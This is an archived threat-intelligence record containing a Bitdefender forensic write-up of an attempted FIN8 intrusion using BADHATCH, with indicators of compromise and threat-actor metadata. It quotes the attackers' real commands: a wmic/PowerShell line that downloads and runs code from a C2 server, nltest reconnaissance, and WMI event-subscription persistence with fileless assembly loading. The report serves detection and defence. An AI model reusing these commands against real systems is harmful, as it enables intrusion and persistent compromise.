{
	"id": "5d411838-02a9-4f51-89a7-0ae8c74969eb",
	"created_at": "2026-04-06T00:12:42.717155Z",
	"updated_at": "2026-04-10T03:34:24.131858Z",
	"deleted_at": null,
	"sha1_hash": "5c78065dea2185f0a877d47223ceb1376f75cb76",
	"title": "Deep Dive Into A FIN8 Attack – A forensic investigation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 248851,
	"plain_text": "Deep Dive Into A FIN8 Attack – A forensic investigation\r\nBy Martin Zugec\r\nPublished: 2021-07-27 · Archived: 2026-04-05 13:32:04 UTC\r\nDuring a recent investigation, our researchers encountered a new version of the BADHATCH malware used by the\r\nwell-known threat actor, FIN8. We previously reported that FIN8 was working on a new version of the\r\nBADHATCH malware - and this recent attack supports our findings and conclusions. FIN8 is known for taking\r\nextended breaks to improve their tactics, techniques, and procedures (TTPs) which increases their success rate.\r\nWith each new version of their toolkit, they start with small tests on a limited pool of victims before launching a\r\nfull-scale attack.\r\nOne of the best defensive tools the security community has is to openly share details about these early attacks to\r\nimprove our defensive toolkits.\r\nThe objective of this blog post is to provide insights into an attempted attack by FIN8 on one of our customers,\r\nand how we worked with the customer to thwart the attack before it could fully develop. Through sharing forensic\r\nanalysis of the attack, we hope this threat intelligence can help other organizations targeted by FIN8.\r\nFIN8’s Tried and True Methods\r\nFIN8 targets financial services and POS (point of sale) systems primarily through “living off the land” attacks –\r\nusing built-in tools and interfaces (like PowerShell or WMI) and abusing legitimate services like sslip.io to\r\ndisguise their activity. A combination of preventive capabilities (to slow down attackers and generate early\r\nindicators) and detect \u0026 respond capabilities is necessary to stop professional adversary groups such as FIN8.\r\nNOTE: Prefixes are assigned to a threat group when a group is classified. Common prefixes are APT (Advanced\r\nPersistent Threat), FIN (Financially Motivated), or TEMP/TMP/UNC (Uncategorized). You can read more about\r\nthis from MITRE. 
Unfortunately, there is no central authority for assigning names, so it is common for the\r\nsame adversary group to have many aliases assigned by different researchers.\r\nAnatomy of an Attack\r\nhttps://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation\r\nPage 1 of 6\n\nWhile the initial infection vector remains unclear, based on previous attacks by this group, it is understood that\r\nFIN8 most likely used social engineering techniques and spear-phishing campaigns for the initial compromise\r\n(read our analysis of FIN8 BADHATCH).\r\nNetwork Reconnaissance\r\nWe know that at least two user accounts were compromised in the aforementioned attack. The first evidence of a\r\ncompromise was detected on one of the database servers. Once on the network, the attackers engaged in network\r\nreconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following\r\ncommands:\r\nnltest.exe /domain_trusts\r\nnltest.exe /dclist:\u003cdomain\u003e\r\nLateral Movement\r\nAfter their initial reconnaissance, the malicious actors spread across the network, expanding their foothold primarily by\r\ntargeting domain controllers. They engaged in lateral movement by using the WMIC utility (a built-in Windows tool) for remote\r\ncode execution.\r\nwmic.exe /node:\u003ctarget\u003e process call create \"cmd /c powershell.exe -nop -ep bypass -c\r\n$pw='b640a9c0e64704e1e202a07774613a29971fe5aa';$pa='sys';iex (New-Object\r\nSystem.Net.WebClient).DownloadString('https://104-168-237-21.sslip[.]io/134af6')\"\r\nWMIC ( wmic.exe ) was used to create a remote command prompt instance ( cmd.exe ), which then executed the\r\nPowerShell code. The PowerShell command created two variables and attempted to download and execute the\r\npayload from one of FIN8’s Command and Control (C\u0026C) servers. 
This download was blocked by Bitdefender –\r\nthe description below is based on our interpretation of these variables from our previous analysis of FIN8 operations.\r\n$pw – Probably the password used to decrypt the downloaded script file. Because the download was blocked, we\r\ncouldn’t analyze the script.\r\n$pa – Instructions for the malicious framework to impersonate the lsass.exe/vmtoolsd.exe token and inject\r\nitself into a new “svchost.exe -k netsvcs” process.\r\nFinally, the command line tried to execute ( iex is an alias for Invoke-Expression ) the code downloaded from the\r\nIP address 104[.]168[.]237[.]21 . The threat actors abused sslip.io for the connection to C\u0026C - a service that provides\r\nfree IP-to-domain mapping to make SSL certificate generation easier for traffic encryption. While this service is\r\nlegitimate and widely used, the malware abused it in an attempt to evade detection when connecting to C\u0026C\r\nservers.\r\nFor one of the machines, a slightly different URL was observed (ending with /edaea0 ) with the identical $pw\r\nand $pa variables. The scripts downloaded from sslip.io were unavailable at the time of this analysis as the\r\nserver was down.\r\nThis attempt was blocked by Bitdefender’s command line scanning capability. To avoid the command line\r\nscanning, the attackers then switched their attack tool to wmiexec.py from Impacket (a collection of Python classes for\r\nlow-level access to packets and network protocols). 
This Python script connected directly to the target\r\nmachine (without installing any service/agent on the target machine) and used valid credentials to execute the\r\ncode.\r\nNOTE: As a result of using wmiexec.py, the command lines we noticed on affected machines have specific output\r\nredirection such as \\ 1\u003e \\\\127.0.0.1\\ADMIN$\\__1621898828.3311949 2\u003e\u00261 .\r\nAs is often the case with sophisticated adversaries, the attackers tried different methods to bypass the deployed\r\nsecurity controls. Via trial and error, they were eventually able to take over some of the servers. One script used by\r\nthe malicious actors, C:\\Windows\\Temp\\rdp.ps1 , was unavailable at the time of this analysis, and we believe it\r\nwas an attempt to use RDP tunneling (FIN8 has been known to use Plink for RDP tunneling).\r\nEstablishing Persistence\r\nAfter successful lateral movement, the attackers tried to establish persistence on selected servers – targeting all\r\ndomain controllers, but also other servers. To achieve persistence, they used WMI Event Subscription with a few\r\ndifferent WMI objects.\r\nPersistence was established on servers using commands such as:\r\ncmd.exe cmd.exe /Q /c powershell.exe -nop -ep bypass -c C:\\sldr.ps1 B4a0f3AE251b7689CFdDe1 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\__1621898828.3311949 2\u003e\u00261\r\nThe script sldr.ps1 contains an RC4 encrypted byte array and the first argument ( B4a0f3AE251b7689CFdDe1 ) is\r\nused as the decryption key. The decrypted script is used to select a .NET binary based on the architecture type (x86\r\nor x64), create the WMI objects used for persistence (described later) and create a WMI event trigger. 
Three objects\r\nare created in WMI to support the persistence.\r\nThe first object ( root\\cimv2\\Win32_Base64Class ) has a property Prop that contains the code of the payload.\r\nThis is used to store the payload in the WMI object.\r\nThe second object ( root\\subscription\\PerfData ) contains a command to retrieve and execute this payload. This\r\nis what is known as a fileless attack - the binary is loaded into memory and a static method .StartCheck() is\r\nexecuted:\r\npowershell.exe -nop -c\r\n[System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:Win32_Base64Class').Properties['Prop'].Value);\r\n[MSDAC.PerfOSChecker]::StartCheck()\r\nFinally, the third object ( root\\subscription\\PerfOs ) handles persistence. It executes the previous PowerShell\r\ncommand when system uptime reaches a certain value (140 seconds after boot up of the system):\r\nSELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA\r\n'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime \u003e= 140 AND\r\nTargetInstance.SystemUpTime \u003c 240\r\nThe entry point of the stored .NET code is the method [MSDAC.PerfOSChecker]::StartCheck() . Once executed,\r\nit decrypts and executes shellcode that downloads the next-stage shellcode by contacting the following domains:\r\napi-cdn[.]net\r\ngit-api[.]com\r\napi-cdnw5[.]net\r\nAfter analyzing the shellcode, Bitdefender was able to download a DLL file that is used in the next stage of the attack.\r\nDepending on the architecture, the shellcode downloads the\r\n4e73e9a546e334f0aee8da7d191c56d25e6360ba7a79dc02fe93efbd41ff7aa4 file for the x64 version, and the\r\n05236172591d843b15987de2243ff1bfb41c7b959d7c917949a7533ed60aafd9 file for the x86 version.\r\nThe downloaded DLL files represent an unknown piece of malware and the analysis of it is ongoing. 
So far, we\r\nknow it is able to collect system information like computer name and volume information and it communicates\r\nwith the same domains as the shellcode. These files were not detected by any AV product (per VirusTotal) at the\r\ntime of discovery and have been signed by Bitdefender in the meantime (see file hashes in the IOCs section\r\nbelow).\r\nFIN8 Response Recommendations\r\nFIN8 typically targets the financial sector with the goal of compromising institutions and POS networks. In this attack,\r\nBitdefender was able to block a number of malicious actions, thus preventing the attack from fully developing. An\r\nimportant element in this scenario was the expertise of the MDR team, who quickly attributed the attack to a\r\nknown adversary group and proactively worked with the customer to thwart the attempt.\r\nTo protect your business from attacks such as this in the future, separate your POS from the networks used by\r\nemployees or guests and monitor access to it. The combination of prevention tools with detection and response\r\ntools is critical to help protect your business. Remember, groups like FIN8 can stealthily infiltrate networks over\r\nmany months, so regularly have your security vendors validate their approach by staying on top of new threats in\r\nyour industry.\r\nIndicators of Compromise\r\nSpecific pre-execution detections for the novel tools and artifacts of this attack have been added to Bitdefender\r\nproducts ( Trojan.GenericKD.46463307 , Trojan.GenericKD.46463302 , Trojan.GenericKD.37075281 ,\r\nTrojan.GenericKD.37075888 ). The malicious domains used in this attack were also blacklisted in our traffic scan\r\nengine. 
\r\nDomains\r\napi-cdn[.]net\r\ngit-api[.]com\r\napi-cdnw5[.]net\r\n104-168-237-21.sslip[.]io\r\nURLs\r\nhttps://104-168-237-21.sslip[.]io/134af6\r\nhttps://104-168-237-21.sslip[.]io/edaea0\r\nSHA256\r\nede6ca7c3c3aedeb70e8504e1df70988263aab60ac664d03995bce645dff0935\r\n5b8b732d0bb708aa51ac7f8a4ff5ca5ea99a84112b8b22d13674da7a8ca18c28\r\n4e73e9a546e334f0aee8da7d191c56d25e6360ba7a79dc02fe93efbd41ff7aa4\r\n05236172591d843b15987de2243ff1bfb41c7b959d7c917949a7533ed60aafd9\r\nedfd3ae4def3ddffb37bad3424eb73c17e156ba5f63fd1d651df2f5b8e34a6c7\r\nFile Names and Locations\r\nC:\\Windows\\Temp\\sldr.ps1\r\nC:\\Windows\\Temp\\s.ps1\r\nC:\\sldr.ps1\r\nC:\\Users\\Public\\s.ps1\r\nWe would like to thank Dragos Teodor Gavrilut, Victor Vrabie, Cristina Vatamanu and Bogdan “Bob” Botezatu\r\nfor their help with putting this report together.\r\nSource: https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://businessinsights.bitdefender.com/deep-dive-into-a-fin8-attack-a-forensic-investigation"
	],
	"report_names": [
		"deep-dive-into-a-fin8-attack-a-forensic-investigation"
	],
	"threat_actors": [
		{
			"id": "3150bf4f-288a-44b8-ab48-0ced9b052a0c",
			"created_at": "2025-08-07T02:03:24.910023Z",
			"updated_at": "2026-04-10T02:00:03.713077Z",
			"deleted_at": null,
			"main_name": "GOLD HUXLEY",
			"aliases": [
				"CTG-6969 ",
				"FIN8 "
			],
			"source_name": "Secureworks:GOLD HUXLEY",
			"tools": [
				"Gozi ISFB",
				"Powersniff"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5bdde906-0416-42ee-9100-5ebd95dda77a",
			"created_at": "2023-01-06T13:46:38.601977Z",
			"updated_at": "2026-04-10T02:00:03.035842Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"ATK113",
				"G0061"
			],
			"source_name": "MISPGALAXY:FIN8",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "72d09c17-e33e-4c2f-95db-f204848cc797",
			"created_at": "2022-10-25T15:50:23.832551Z",
			"updated_at": "2026-04-10T02:00:05.336787Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"FIN8",
				"Syssphinx"
			],
			"source_name": "MITRE:FIN8",
			"tools": [
				"BADHATCH",
				"PUNCHBUGGY",
				"Ragnar Locker",
				"PUNCHTRACK",
				"dsquery",
				"Nltest",
				"Sardonic",
				"PsExec",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fc80a724-e567-457c-82bb-70147435e129",
			"created_at": "2022-10-25T16:07:23.624289Z",
			"updated_at": "2026-04-10T02:00:04.691643Z",
			"deleted_at": null,
			"main_name": "FIN8",
			"aliases": [
				"ATK 113",
				"G0061",
				"Storm-0288",
				"Syssphinx"
			],
			"source_name": "ETDA:FIN8",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BadHatch",
				"BlackCat",
				"Noberus",
				"PSVC",
				"PUNCHTRACK",
				"PoSlurp",
				"Powersniff",
				"PunchBuggy",
				"Ragnar Loader",
				"Ragnar Locker",
				"RagnarLocker",
				"Sardonic",
				"ShellTea"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434362,
	"ts_updated_at": 1775792064,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.pdf",
		"text": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.txt",
		"img": "https://archive.orkl.eu/5c78065dea2185f0a877d47223ceb1376f75cb76.jpg"
	}
}